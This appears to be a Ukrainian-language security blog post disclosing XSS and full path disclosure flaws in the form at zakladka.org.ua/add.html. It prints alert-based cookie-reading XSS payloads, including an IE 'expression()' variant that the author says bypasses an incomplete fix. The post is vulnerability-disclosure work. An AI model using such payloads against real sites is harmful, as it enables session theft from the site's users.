Websecurity - Веб безпека

26.02.2007

Ще в вересні, 29.09.2006 (трохи відклалося з цим анонсом), я знайшов Cross-Site Scripting та Full path disclosure уразливості на популярному проекті http://zakladka.org.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

30.01.2008

XSS:

POST запит на сторінці http://zakladka.org.ua/add.html

<script>alert(document.cookie)<script>В полі: Подай URL сторінки.

Full path disclosure:

Такий самий POST запит на сторінці http://zakladka.org.ua/add.html.

Дані уразливості вже виправлені. Але XSS дірка виправлена не повністю і при невеликій модифікації знову працює.

XSS:

POST запит на сторінці http://zakladka.org.ua/add.html (для IE)

" style="xss:expression(alert(document.cookie))В полі: Подай URL сторінки.

This entry was posted on 19:41 30.01.2008 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.